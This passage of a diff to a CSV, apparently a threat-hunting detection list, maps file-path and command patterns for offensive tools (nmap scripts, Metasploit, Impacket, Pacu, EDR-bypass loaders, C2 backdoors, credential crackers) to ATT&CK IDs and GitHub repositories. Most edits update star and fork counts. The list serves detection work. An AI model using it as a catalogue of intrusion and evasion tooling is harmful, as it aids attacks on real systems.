agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1109","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/http-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-majordomo2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-malware-host.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3868,7 +3887,7 @@ "*/http-method-tamper.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-mobileversion-checker.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-nikto-scan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" -"*/http-ntlm/ntlmtransport*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1991","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" +"*/http-ntlm/ntlmtransport*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z" "*/http-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-open-proxy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-open-redirect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3932,7 +3951,7 @@ "*/http-vuln-cve2017-5638.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-5689.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2017-8917.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3002","526","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" +"*/http-vulners-regex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","1","N/A","N/A","10","3003","527","2022-12-16T11:22:30Z","2017-12-19T21:21:28Z" "*/http-vuln-misfortune-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-wnr1000-creds.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-waf-detect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3944,13 +3963,13 @@ "*/http-xssed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/huan.exe *","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","0","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" "*/HuanLoader/*","offensive_tool_keyword","Huan","Huan is an encrypted PE Loader Generator that I developed for learning PE file structure and PE loading processes. It encrypts the PE file to be run with different keys each time and embeds it in a new section of the loader binary. Currently. it works on 64 bit PE files.","T1027 - T1036 - T1564 - T1003 - T1056 - T1204 - T1588 - T1620","TA0002 - TA0008 - ","N/A","N/A","Exploitation tools","https://github.com/frkngksl/Huan","1","1","N/A","N/A","6","518","103","2021-08-13T10:48:26Z","2021-05-21T08:55:02Z" -"*/HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","173","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" +"*/HWSyscalls.cpp*","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","175","35","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*/hyperion.exe*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/Hypnos.git*","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","1","N/A","10","1","49","5","2023-08-22T20:17:31Z","2023-07-11T09:07:10Z" "*/hypobrychium.git*","offensive_tool_keyword","hypobrychium","hypobrychium AV/EDR Bypass","T1562.001 - T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/foxlox/hypobrychium","1","1","N/A","8","1","72","21","2023-07-21T21:13:20Z","2023-07-18T09:55:07Z" -"*/iam__backdoor_users_password*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/iam__bruteforce_permissions/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/iam__privesc_scan*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/iam__backdoor_users_password*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/iam__bruteforce_permissions/*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/iam__privesc_scan*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" "*/iax2-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/iax2-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/icap-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -3958,31 +3977,32 @@ "*/icebreaker.py*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/IDiagnosticProfileUAC*","offensive_tool_keyword","IDiagnosticProfileUAC","UAC bypass using auto-elevated COM object Virtual Factory for DiagCpl","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/Wh04m1001/IDiagnosticProfileUAC","1","1","N/A","10","2","173","32","2022-07-02T20:31:47Z","2022-07-02T19:55:42Z" "*/iec-identify.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/ielocalserver.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/ieshell32.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/ielocalserver.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/ieshell32.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/iis_controller.py*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "*/IIS-Raid.git*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" -"*/ike-crack.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*/ike-crack.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*/IKEForce*","offensive_tool_keyword","IKEForce","IKEForce is a command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.","T1110 - T1201 - T1018","TA0001 - TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/SpiderLabs/ikeforce","1","0","N/A","N/A","3","226","73","2019-09-18T09:35:41Z","2014-09-12T01:11:00Z" "*/ike-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-capabilities.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imap-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/imfiver/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/imfiver/CVE-2022-0847","1","1","N/A","N/A","3","257","74","2023-02-02T02:17:30Z","2022-03-07T18:36:50Z" -"*/impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*/impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*/impersonate-rs*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","77","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" -"*/imperun * *cmd.exe /c whoami*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","72","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" +"*/impacket.*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/impacket/*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/impersonate.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/impersonate-rs*","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","1","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"*/imperun * *cmd.exe /c whoami*","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","73","10","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*/Imperva_gzip_WAF_Bypass*","offensive_tool_keyword","Imperva_gzip_WAF_Bypass","Imperva Cloud WAF was vulnerable to a bypass that allows attackers to evade WAF rules when sending malicious HTTP POST payloads. such as log4j exploits. SQL injection. command execution. directory traversal. XXE. etc.","T1190 - T1210 - T1506 - T1061 - T1071 - T1100 - T1220","TA0001 - TA0002 - TA0003 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/BishopFox/Imperva_gzip_WAF_Bypass","1","1","N/A","N/A","2","146","29","2022-01-07T17:39:29Z","2022-01-07T17:38:33Z" "*/implant/callback*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 